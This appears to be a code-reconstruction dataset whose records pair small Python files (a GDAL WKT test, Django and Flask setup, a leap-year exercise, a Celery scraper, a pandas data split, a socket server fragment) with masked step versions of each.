'MULTIPOINT(EMPTY)', 'MULTIPOINT EMPTY'), ('POINT ( EMPTY )',\n 'POINT EMPTY'), ('LINESTRING(EMPTY)', 'LINESTRING EMPTY'), (\n 'POLYGON ( EMPTY )', 'POLYGON EMPTY'), ('GEOMETRYCOLLECTION EMPTY',\n 'GEOMETRYCOLLECTION EMPTY'), ('MULTIPOLYGON EMPTY',\n 'MULTIPOLYGON EMPTY'), ('MULTILINESTRING EMPTY',\n 'MULTILINESTRING EMPTY'), ('MULTIPOINT EMPTY', 'MULTIPOINT EMPTY'), (\n 'POINT EMPTY', 'POINT EMPTY'), ('LINESTRING EMPTY', 'LINESTRING EMPTY'),\n ('POLYGON EMPTY', 'POLYGON EMPTY')]\n\n\ndef ogr_wktempty_test_partial_empty_geoms():\n wkt = 'MULTIPOINT (1 1)'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. 
Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPoint))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))\n wkt = 'MULTIPOINT (1 1)'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLineString))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n wkt = 'POLYGON EMPTY'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbLinearRing))\n ring = ogr.Geometry(type=ogr.wkbLinearRing)\n ring.AddPoint_2D(0, 0)\n ring.AddPoint_2D(10, 0)\n ring.AddPoint_2D(10, 10)\n ring.AddPoint_2D(0, 10)\n ring.AddPoint_2D(0, 0)\n geom.AddGeometry(ring)\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. 
Expected value is: ' + wkt)\n return 'fail'\n wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')\n geom.AddGeometry(ogr.Geometry(type=ogr.wkbPolygon))\n geom.AddGeometry(ogr.CreateGeometryFromWkt(\n 'POLYGON ((100 0,100 10,110 10,100 0))'))\n wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason('WKT is wrong: ' + geom.ExportToWkt() +\n '. Expected value is: ' + wkt)\n return 'fail'\n return 'success'\n\n\ngdaltest_list = []\nfor item in empty_wkt_list:\n ut = TestWktEmpty(item[0], item[1])\n gdaltest_list.append((ut.CheckIsEmpty, item[0]))\ngdaltest_list.append(ogr_wktempty_test_partial_empty_geoms)\nif __name__ == '__main__':\n gdaltest.setup_run('ogr_wktempty')\n gdaltest.run_tests(gdaltest_list)\n gdaltest.summarize()\n",
"step-5": "#!/usr/bin/env python\n###############################################################################\n# $Id$\n#\n# Project: GDAL/OGR Test Suite\n# Purpose: Test support for the various \"EMPTY\" WKT geometry representations.\n# Author: Frank Warmerdam <warmerdam@pobox.com>\n# \n###############################################################################\n# Copyright (c) 2004, Frank Warmerdam <warmerdam@pobox.com>\n# Copyright (c) 2008, Even Rouault <even dot rouault at mines-paris dot org>\n# \n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Library General Public\n# License as published by the Free Software Foundation; either\n# version 2 of the License, or (at your option) any later version.\n# \n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Library General Public License for more details.\n# \n# You should have received a copy of the GNU Library General Public\n# License along with this library; if not, write to the\n# Free Software Foundation, Inc., 59 Temple Place - Suite 330,\n# Boston, MA 02111-1307, USA.\n###############################################################################\n\nimport os\nimport sys\nimport string\n\nsys.path.append( '../pymod' )\n\nimport gdaltest\nimport ogrtest\nfrom osgeo import ogr\nfrom osgeo import gdal\n\nclass TestWktEmpty:\n def __init__( self, inString, expectedOutString ):\n self.inString = inString\n self.expectedOutString = expectedOutString\n\n def isEmpty(self, geom):\n try:\n ogr.Geometry.IsEmpty\n except:\n return 'skip'\n\n if (geom.IsEmpty() == False):\n geom.Destroy()\n gdaltest.post_reason (\"IsEmpty returning false for an empty geometry\")\n return 'fail'\n\n return 'success'\n\n def CheckIsEmpty(self):\n geom = ogr.CreateGeometryFromWkt( self.inString )\n wkt = geom.ExportToWkt()\n\n 
if self.expectedOutString != 'POINT EMPTY':\n if ogr.CreateGeometryFromWkb(geom.ExportToWkb()).ExportToWkt() != wkt:\n return 'fail'\n\n if wkt == self.expectedOutString:\n if self.isEmpty(geom) == 'fail':\n return 'fail'\n else:\n return 'success'\n else:\n gdaltest.post_reason( 'WKT is wrong: ' + wkt + '. Expected value is: ' + self.expectedOutString )\n return 'fail'\n\nempty_wkt_list = [ \\\n ('GEOMETRYCOLLECTION(EMPTY)', 'GEOMETRYCOLLECTION EMPTY'),\n ('MULTIPOLYGON( EMPTY )', 'MULTIPOLYGON EMPTY'),\n ('MULTILINESTRING(EMPTY)', 'MULTILINESTRING EMPTY'),\n ('MULTIPOINT(EMPTY)', 'MULTIPOINT EMPTY'),\n ('POINT ( EMPTY )', 'POINT EMPTY'),\n ('LINESTRING(EMPTY)', 'LINESTRING EMPTY'),\n ('POLYGON ( EMPTY )', 'POLYGON EMPTY'),\n\n ('GEOMETRYCOLLECTION EMPTY', 'GEOMETRYCOLLECTION EMPTY'),\n ('MULTIPOLYGON EMPTY', 'MULTIPOLYGON EMPTY'),\n ('MULTILINESTRING EMPTY', 'MULTILINESTRING EMPTY'),\n ('MULTIPOINT EMPTY', 'MULTIPOINT EMPTY'),\n ('POINT EMPTY', 'POINT EMPTY'),\n ('LINESTRING EMPTY', 'LINESTRING EMPTY'),\n ('POLYGON EMPTY', 'POLYGON EMPTY')\n ]\n\n\ndef ogr_wktempty_test_partial_empty_geoms():\n\n # Multipoint with a valid point and an empty point\n wkt = 'MULTIPOINT (1 1)'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbPoint ))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n # Multipoint with an empty point and a valid point\n geom = ogr.CreateGeometryFromWkt('MULTIPOINT EMPTY')\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbPoint ))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('POINT (1 1)'))\n wkt = 'MULTIPOINT (1 1)'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. 
Expected value is: ' + wkt )\n return 'fail'\n\n # Multilinestring with a valid string and an empty linestring\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbLineString ))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n # Multilinestring with an empty linestring and a valid linestring\n geom = ogr.CreateGeometryFromWkt('MULTILINESTRING EMPTY')\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbLineString ))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('LINESTRING (0 1,2 3,4 5,0 1)'))\n wkt = 'MULTILINESTRING ((0 1,2 3,4 5,0 1))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n # Polygon with a valid external ring and an empty internal ring\n wkt = 'POLYGON ((100 0,100 10,110 10,100 0))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbLinearRing ))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n # Polygon with an empty external ring and a valid internal ring\n wkt = 'POLYGON EMPTY'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbLinearRing ))\n ring = ogr.Geometry( type = ogr.wkbLinearRing )\n ring.AddPoint_2D( 0, 0)\n ring.AddPoint_2D( 10, 0)\n ring.AddPoint_2D( 10, 10)\n ring.AddPoint_2D( 0, 10)\n ring.AddPoint_2D( 0, 0)\n geom.AddGeometry(ring)\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. 
Expected value is: ' + wkt )\n return 'fail'\n\n # Multipolygon with a valid polygon and an empty polygon\n wkt = 'MULTIPOLYGON (((0 0,0 10,10 10,0 0)))'\n geom = ogr.CreateGeometryFromWkt(wkt)\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbPolygon ))\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n # Multipolygon with an empty polygon and a valid polygon\n geom = ogr.CreateGeometryFromWkt('MULTIPOLYGON EMPTY')\n geom.AddGeometry(ogr.Geometry( type = ogr.wkbPolygon ))\n geom.AddGeometry(ogr.CreateGeometryFromWkt('POLYGON ((100 0,100 10,110 10,100 0))'))\n wkt = 'MULTIPOLYGON (((100 0,100 10,110 10,100 0)))'\n if geom.ExportToWkt() != wkt:\n gdaltest.post_reason( 'WKT is wrong: ' + geom.ExportToWkt() + '. Expected value is: ' + wkt )\n return 'fail'\n\n return 'success'\n\n\ngdaltest_list = []\n\nfor item in empty_wkt_list:\n ut = TestWktEmpty( item[0], item[1] )\n gdaltest_list.append( (ut.CheckIsEmpty, item[0]) )\ngdaltest_list.append( ogr_wktempty_test_partial_empty_geoms )\n\nif __name__ == '__main__':\n\n gdaltest.setup_run( 'ogr_wktempty' )\n\n gdaltest.run_tests( gdaltest_list )\n\n gdaltest.summarize()\n\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
from django.urls import path
from .views.home import Home
from .views.signup import Signup
from .views.login import Login
urlpatterns = [
path('', Home.as_view(), name='home'),
path('signup', Signup.as_view(), name='signup'),
path('login', Login.as_view(), name='login'),
]
|
normal
|
{
"blob_id": "979a387e29867818ffad7291511ff0be40dee118",
"index": 1938,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('', Home.as_view(), name='home'), path('signup', Signup\n .as_view(), name='signup'), path('login', Login.as_view(), name='login')]\n",
"step-3": "from django.urls import path\nfrom .views.home import Home\nfrom .views.signup import Signup\nfrom .views.login import Login\nurlpatterns = [path('', Home.as_view(), name='home'), path('signup', Signup\n .as_view(), name='signup'), path('login', Login.as_view(), name='login')]\n",
"step-4": "from django.urls import path\nfrom .views.home import Home\nfrom .views.signup import Signup\nfrom .views.login import Login\nurlpatterns = [\n path('', Home.as_view(), name='home'),\n path('signup', Signup.as_view(), name='signup'),\n path('login', Login.as_view(), name='login'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__author__ = 'Xomak'
add_requests = Blueprint('addrequests', __name__, template_folder='templates')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from flask import Blueprint
__author__ = 'Xomak'
add_requests = Blueprint('addrequests', __name__, template_folder='templates')
from . import routes
<|reserved_special_token_1|>
"""
Add requests application (adding and managing add-requests)
"""
from flask import Blueprint
__author__ = 'Xomak'
add_requests = Blueprint('addrequests', __name__, template_folder='templates', )
from . import routes
|
flexible
|
{
"blob_id": "d39965c3070ec25230b4d6977ff949b3db070ab6",
"index": 7399,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n__author__ = 'Xomak'\nadd_requests = Blueprint('addrequests', __name__, template_folder='templates')\n<mask token>\n",
"step-3": "<mask token>\nfrom flask import Blueprint\n__author__ = 'Xomak'\nadd_requests = Blueprint('addrequests', __name__, template_folder='templates')\nfrom . import routes\n",
"step-4": "\"\"\"\nAdd requests application (adding and managing add-requests)\n\"\"\"\n\nfrom flask import Blueprint\n\n__author__ = 'Xomak'\n\nadd_requests = Blueprint('addrequests', __name__, template_folder='templates', )\n\nfrom . import routes",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if ano1 == 0 and ano2 != 0:
print('\nO ano de {} é Bissexto !!'.format(ano))
else:
print('\nO ano de {} não foi Bissexto !!'.format(ano))
<|reserved_special_token_1|>
ano = int(input('\nInforme o ano: '))
ano1 = ano % 4
ano2 = ano % 100
if ano1 == 0 and ano2 != 0:
print('\nO ano de {} é Bissexto !!'.format(ano))
else:
print('\nO ano de {} não foi Bissexto !!'.format(ano))
<|reserved_special_token_1|>
# Enunciado: faça um programa que leia um ano qualquer e mostre se ele é BISEXTO.
ano = int(input('\nInforme o ano: '))
ano1 = ano % 4
ano2 = ano % 100
if ano1 == 0 and ano2 != 0:
print('\nO ano de {} é Bissexto !!'.format(ano))
else:
print('\nO ano de {} não foi Bissexto !!'.format(ano))
|
flexible
|
{
"blob_id": "daeb11000978d14a05ea62113dcf6e30d6a98b15",
"index": 3590,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif ano1 == 0 and ano2 != 0:\n print('\\nO ano de {} é Bissexto !!'.format(ano))\nelse:\n print('\\nO ano de {} não foi Bissexto !!'.format(ano))\n",
"step-3": "ano = int(input('\\nInforme o ano: '))\nano1 = ano % 4\nano2 = ano % 100\nif ano1 == 0 and ano2 != 0:\n print('\\nO ano de {} é Bissexto !!'.format(ano))\nelse:\n print('\\nO ano de {} não foi Bissexto !!'.format(ano))\n",
"step-4": "# Enunciado: faça um programa que leia um ano qualquer e mostre se ele é BISEXTO.\n\nano = int(input('\\nInforme o ano: '))\n\nano1 = ano % 4\nano2 = ano % 100\n\nif ano1 == 0 and ano2 != 0:\n print('\\nO ano de {} é Bissexto !!'.format(ano))\nelse:\n print('\\nO ano de {} não foi Bissexto !!'.format(ano))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from celery.task.schedules import crontab
from celery.decorators import periodic_task
from celery.utils.log import get_task_logger
from bbapp.scripts.getScores import doScoresScrape, fixScores
logger = get_task_logger(__name__)
@periodic_task(
run_every=(crontab(minute='*/10')),
name="scrape_espn_feed",
ignore_result=True
)
def scrape_espn_feed():
"""
Saves latest image from Flickr
"""
thescores = doScoresScrape()
fixScores(thescores, 'MLB')
logger.info("Scores scraped")
|
normal
|
{
"blob_id": "a9a067ee3b176d2f2ca558b69ce2bc598bb31d22",
"index": 4501,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@periodic_task(run_every=crontab(minute='*/10'), name='scrape_espn_feed',\n ignore_result=True)\ndef scrape_espn_feed():\n \"\"\"\n Saves latest image from Flickr\n \"\"\"\n thescores = doScoresScrape()\n fixScores(thescores, 'MLB')\n logger.info('Scores scraped')\n",
"step-3": "<mask token>\nlogger = get_task_logger(__name__)\n\n\n@periodic_task(run_every=crontab(minute='*/10'), name='scrape_espn_feed',\n ignore_result=True)\ndef scrape_espn_feed():\n \"\"\"\n Saves latest image from Flickr\n \"\"\"\n thescores = doScoresScrape()\n fixScores(thescores, 'MLB')\n logger.info('Scores scraped')\n",
"step-4": "from celery.task.schedules import crontab\nfrom celery.decorators import periodic_task\nfrom celery.utils.log import get_task_logger\nfrom bbapp.scripts.getScores import doScoresScrape, fixScores\nlogger = get_task_logger(__name__)\n\n\n@periodic_task(run_every=crontab(minute='*/10'), name='scrape_espn_feed',\n ignore_result=True)\ndef scrape_espn_feed():\n \"\"\"\n Saves latest image from Flickr\n \"\"\"\n thescores = doScoresScrape()\n fixScores(thescores, 'MLB')\n logger.info('Scores scraped')\n",
"step-5": "from celery.task.schedules import crontab\nfrom celery.decorators import periodic_task\nfrom celery.utils.log import get_task_logger\n\n\nfrom bbapp.scripts.getScores import doScoresScrape, fixScores\n\nlogger = get_task_logger(__name__)\n\n\n@periodic_task(\n run_every=(crontab(minute='*/10')),\n name=\"scrape_espn_feed\",\n ignore_result=True\n)\ndef scrape_espn_feed():\n \"\"\"\n Saves latest image from Flickr\n \"\"\"\n thescores = doScoresScrape()\n fixScores(thescores, 'MLB')\n logger.info(\"Scores scraped\")",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def split_data(data):
df = pd.read_csv(data)
ranks = df.groupby('userId')['timestamp'].rank(method='first')
counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))
df['new_col'] = ranks / counts > 0.8
print(df.head())
train = df.loc[df['new_col'] == False]
test = df.loc[df['new_col'] == True]
train = train.drop(['new_col'], axis=1)
test = test.drop(['new_col'], axis=1)
train.to_csv(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\training.csv'
, header=False, index=False)
test.to_csv(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\testing.csv'
, header=False, index=False)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def split_data(data):
df = pd.read_csv(data)
ranks = df.groupby('userId')['timestamp'].rank(method='first')
counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))
df['new_col'] = ranks / counts > 0.8
print(df.head())
train = df.loc[df['new_col'] == False]
test = df.loc[df['new_col'] == True]
train = train.drop(['new_col'], axis=1)
test = test.drop(['new_col'], axis=1)
train.to_csv(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\training.csv'
, header=False, index=False)
test.to_csv(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\testing.csv'
, header=False, index=False)
split_data(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\ratings.csv')
<|reserved_special_token_1|>
import matplotlib.pyplot as plt
import pandas as pd
from collections import Counter
import numpy as np
import imdb
import csv
import networkx as nx
from networkx import *
def split_data(data):
df = pd.read_csv(data)
ranks = df.groupby('userId')['timestamp'].rank(method='first')
counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))
df['new_col'] = ranks / counts > 0.8
print(df.head())
train = df.loc[df['new_col'] == False]
test = df.loc[df['new_col'] == True]
train = train.drop(['new_col'], axis=1)
test = test.drop(['new_col'], axis=1)
train.to_csv(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\training.csv'
, header=False, index=False)
test.to_csv(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\testing.csv'
, header=False, index=False)
split_data(
'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\ratings.csv')
<|reserved_special_token_1|>
import matplotlib.pyplot as plt
import pandas as pd
from collections import Counter
import numpy as np
import imdb
import csv
import networkx as nx
from networkx import *
def split_data(data):
df = pd.read_csv(data)
ranks = df.groupby('userId')['timestamp'].rank(method='first')
counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))
# myes = (ranks / counts) > 0.8
df['new_col'] = (ranks / counts) > 0.8
# print(myes)
print(df.head())
train = df.loc[df['new_col'] == False]
test = df.loc[df['new_col'] == True]
train = train.drop(['new_col'], axis=1)
test = test.drop(['new_col'], axis=1)
train.to_csv(r'C:\Users\Darkmaster\PycharmProjects\Recommender\Data\Cvorm\training.csv', header=False, index=False)
test.to_csv(r'C:\Users\Darkmaster\PycharmProjects\Recommender\Data\Cvorm\testing.csv', header=False, index=False)
# print(test.head())
# ----AND THEN SAVE THOSE AS CSV----
# for row in df.index
# print(test_train)
# print(ranks.head())
# print(counts.head())
# def make_train_or_test_txt(ratingdata):
# df = pd.read_csv(ratingdata)
# users = []
# [users.append(x) for x in df["userId"] if x not in users]
# print(users)
# with open('Data/KGAT/train.txt', 'w') as f:
# # writer = csv.writer(f, delimiter='\t')
# for x in users:
# items = []
# items = df.query('userId == {}'.format(x))["movieId"]
# items = items.values.tolist()
# stringerbell = ''.join((str(e) + "\t") for e in items)
# print(stringerbell)
# # writer.writerow("{}{}".format(x, items))
# # writer.writerow(str(x) + stringerbell)
# f.write(str(x) + "\t" + stringerbell + "\n")
# # print(items)
# # for j in range(len(df)):
# # try:
# # getitems = [x for x in df.loc[df["movieId"]]]
# # except:
# # continue
# print(df.head())
# make_train_or_test_txt('Data/ratings.csv')
split_data('C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\ratings.csv')
|
flexible
|
{
"blob_id": "e3b39c6655fc14efec3b3f95b08bc7b2c036cbdc",
"index": 4117,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef split_data(data):\n df = pd.read_csv(data)\n ranks = df.groupby('userId')['timestamp'].rank(method='first')\n counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))\n df['new_col'] = ranks / counts > 0.8\n print(df.head())\n train = df.loc[df['new_col'] == False]\n test = df.loc[df['new_col'] == True]\n train = train.drop(['new_col'], axis=1)\n test = test.drop(['new_col'], axis=1)\n train.to_csv(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\Cvorm\\\\training.csv'\n , header=False, index=False)\n test.to_csv(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\Cvorm\\\\testing.csv'\n , header=False, index=False)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef split_data(data):\n df = pd.read_csv(data)\n ranks = df.groupby('userId')['timestamp'].rank(method='first')\n counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))\n df['new_col'] = ranks / counts > 0.8\n print(df.head())\n train = df.loc[df['new_col'] == False]\n test = df.loc[df['new_col'] == True]\n train = train.drop(['new_col'], axis=1)\n test = test.drop(['new_col'], axis=1)\n train.to_csv(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\Cvorm\\\\training.csv'\n , header=False, index=False)\n test.to_csv(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\Cvorm\\\\testing.csv'\n , header=False, index=False)\n\n\nsplit_data(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\ratings.csv')\n",
"step-4": "import matplotlib.pyplot as plt\nimport pandas as pd\nfrom collections import Counter\nimport numpy as np\nimport imdb\nimport csv\nimport networkx as nx\nfrom networkx import *\n\n\ndef split_data(data):\n df = pd.read_csv(data)\n ranks = df.groupby('userId')['timestamp'].rank(method='first')\n counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))\n df['new_col'] = ranks / counts > 0.8\n print(df.head())\n train = df.loc[df['new_col'] == False]\n test = df.loc[df['new_col'] == True]\n train = train.drop(['new_col'], axis=1)\n test = test.drop(['new_col'], axis=1)\n train.to_csv(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\Cvorm\\\\training.csv'\n , header=False, index=False)\n test.to_csv(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\Cvorm\\\\testing.csv'\n , header=False, index=False)\n\n\nsplit_data(\n 'C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\ratings.csv')\n",
"step-5": "import matplotlib.pyplot as plt\nimport pandas as pd\nfrom collections import Counter\nimport numpy as np\nimport imdb\nimport csv\nimport networkx as nx\nfrom networkx import *\ndef split_data(data):\n df = pd.read_csv(data)\n ranks = df.groupby('userId')['timestamp'].rank(method='first')\n counts = df['userId'].map(df.groupby('userId')['timestamp'].apply(len))\n # myes = (ranks / counts) > 0.8\n df['new_col'] = (ranks / counts) > 0.8\n # print(myes)\n print(df.head())\n train = df.loc[df['new_col'] == False]\n test = df.loc[df['new_col'] == True]\n\n train = train.drop(['new_col'], axis=1)\n test = test.drop(['new_col'], axis=1)\n\n train.to_csv(r'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\training.csv', header=False, index=False)\n test.to_csv(r'C:\\Users\\Darkmaster\\PycharmProjects\\Recommender\\Data\\Cvorm\\testing.csv', header=False, index=False)\n\n # print(test.head())\n\n\n # ----AND THEN SAVE THOSE AS CSV----\n\n # for row in df.index\n # print(test_train)\n # print(ranks.head())\n # print(counts.head())\n\n\n\n# def make_train_or_test_txt(ratingdata):\n# df = pd.read_csv(ratingdata)\n# users = []\n# [users.append(x) for x in df[\"userId\"] if x not in users]\n# print(users)\n# with open('Data/KGAT/train.txt', 'w') as f:\n# # writer = csv.writer(f, delimiter='\\t')\n# for x in users:\n# items = []\n# items = df.query('userId == {}'.format(x))[\"movieId\"]\n# items = items.values.tolist()\n# stringerbell = ''.join((str(e) + \"\\t\") for e in items)\n# print(stringerbell)\n# # writer.writerow(\"{}{}\".format(x, items))\n# # writer.writerow(str(x) + stringerbell)\n# f.write(str(x) + \"\\t\" + stringerbell + \"\\n\")\n# # print(items)\n# # for j in range(len(df)):\n# # try:\n# # getitems = [x for x in df.loc[df[\"movieId\"]]]\n# # except:\n# # continue\n# print(df.head())\n\n\n\n\n\n# make_train_or_test_txt('Data/ratings.csv')\nsplit_data('C:\\\\Users\\\\Darkmaster\\\\PycharmProjects\\\\Recommender\\\\Data\\\\ratings.csv')",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#!/usr/bin/env python
#_*_ coding:utf-8 _*_
'''
@author: tanglei
@contact: tanglei_0315@163.com
@file: index.py
@time: 2017/11/1 16:26
'''
#需求:
#1.每个客户端需要监控的服务不同
#2.每个服务的监控间隔不同
#3.允许模板的形式批量修改监控指标
#4.不同设备的监控阀值不同
#5.可自定义最近n分钟内hit\max\avg\last\... 指标超过阀值
#6.报警策略,报警等级,报警自动升级
#7.历史数据的存储和优化 时间越久数据越失真
#8.跨机房,跨区域代理服务器
#第三方的socket框架:twisted
|
flexible
|
{
"blob_id": "886101e5d86daf6c2ac0fe92b361ccca6132b1aa",
"index": 3030,
"step-1": "<mask token>\n",
"step-2": "#!/usr/bin/env python\n#_*_ coding:utf-8 _*_\n'''\n@author: tanglei\n@contact: tanglei_0315@163.com\n@file: index.py\n@time: 2017/11/1 16:26\n'''\n#需求:\n#1.每个客户端需要监控的服务不同\n#2.每个服务的监控间隔不同\n#3.允许模板的形式批量修改监控指标\n#4.不同设备的监控阀值不同\n#5.可自定义最近n分钟内hit\\max\\avg\\last\\... 指标超过阀值\n#6.报警策略,报警等级,报警自动升级\n#7.历史数据的存储和优化 时间越久数据越失真\n#8.跨机房,跨区域代理服务器\n#第三方的socket框架:twisted\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import socket
from Server.MachineClient.Identification import Identification
from Server.SQL import DataBase
import threading
import time
from Server.Connection.AcceptClients import Accept
from Server.Connection.ConnectionCheck import ConnectionCheck
from Server.Clients_Data import Clients
class MachineClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.db = DataBase(r"C:\Users\user\Documents\RemoteControl\Server\pythonsqlite.db")
self.data = ""
self.clients = Clients()
self.remote_client = []
def connection_check(self):
connection_check = ConnectionCheck(self.s, self.clients)
if connection_check.check_database_update():
return
while True:
time.sleep(2)
connection_check.connect_db()
self.clients = connection_check.start()
def connection(self):
while True:
for c in self.clients.data:
if c[1] is not None:
print("connection")
self.s.settimeout(0.5)
try:
